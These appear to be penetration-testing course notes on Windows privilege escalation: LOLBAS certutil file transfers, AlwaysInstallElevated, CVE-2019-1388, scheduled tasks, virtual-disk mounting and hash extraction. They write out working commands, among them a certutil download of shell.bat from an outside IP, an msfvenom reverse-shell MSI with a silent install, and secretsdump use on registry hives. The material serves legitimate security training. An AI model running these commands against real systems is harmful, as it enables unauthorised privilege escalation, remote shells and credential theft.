25.Miscellaneous-techniques

LOLBAS - certutil.exe

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
certutil -encode file1 encodedfile
certutil -decode encodedfile file2

Always Install Elevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Scheduled Tasks

schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State
.\accesschk64.exe /accepteula -s -d C:\Scripts\

User/Computer Description Field

Get-LocalUser
Get-WmiObject -Class Win32_OperatingSystem | select Description

Mount VHDX/VMDK (Linux)

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

Retrieving Hashes (Linux)

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

1. Living Off The Land Binaries and Scripts (LOLBAS):

• Concept: Using legitimate, Microsoft-signed binaries and scripts for malicious purposes.

• Example: certutil.exe:

  • File transfer: certutil.exe -urlcache -split -f http://<IP>/file.exe file.exe

  • Base64 encoding: certutil -encode file1 encodedfile

  • Base64 decoding: certutil -decode encodedfile file2

• rundll32.exe: Used to execute DLLs.

2. Always Install Elevated:

• Vulnerability: If enabled, any MSI package can be installed with SYSTEM privileges.

• Enumeration:

  • reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

  • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

• Exploitation:

  • Generate malicious MSI: msfvenom -p windows/shell_reverse_tcp lhost=<IP> lport=<PORT> -f msi > aie.msi

  • Execute: msiexec /i aie.msi /quiet /qn /norestart

3. CVE-2019-1388:

• Vulnerability: Privilege escalation through the Windows Certificate Dialog.

• Exploitation:

  • Run hhupd.exe as administrator.

  • Open certificate details.

  • Click the "Issued By" hyperlink.

  • Use "View page source" and "Save as" to launch cmd.exe as SYSTEM.

4. Scheduled Tasks:

• Enumeration:

  • schtasks /query /fo LIST /v

  • PowerShell: Get-ScheduledTask | select TaskName,State

• Exploitation:

  • If write permissions exist on task scripts or the task itself, modify them for malicious code execution.

  • Accesschk.exe to check folder permissions.

5. User/Computer Description Field:

• Enumeration:

  • PowerShell: Get-LocalUser

  • PowerShell: Get-WmiObject -Class Win32_OperatingSystem | select Description

6. Mount VHDX/VMDK:

• Technique: Mount virtual hard disk files to access their contents.

• Linux:

  • VMDK: guestmount -a <VMDK_FILE> -i --ro /mnt/vmdk

  • VHD/VHDX: guestmount --add <VHDX_FILE> --ro /mnt/vhdx/ -m /dev/sda1

• Windows:

  • Right-click and "Mount" or use Disk Management.

  • PowerShell: Mount-VHD

  • VMDK: Map Virtual Disk, VMWare workstation, or 7zip.

7. Retrieving Hashes using Secretsdump.py:

• Technique: Extract password hashes from SAM, SECURITY, and SYSTEM registry hives.

• Command: secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Key Commands and Tools:

• certutil.exe

• rundll32.exe

• reg query

• msfvenom

• msiexec

• schtasks

• Get-ScheduledTask (PowerShell)

• Get-LocalUser (PowerShell)

• Get-WmiObject (PowerShell)

• guestmount (Linux)

• secretsdump.py (Impacket)

• Accesschk.exe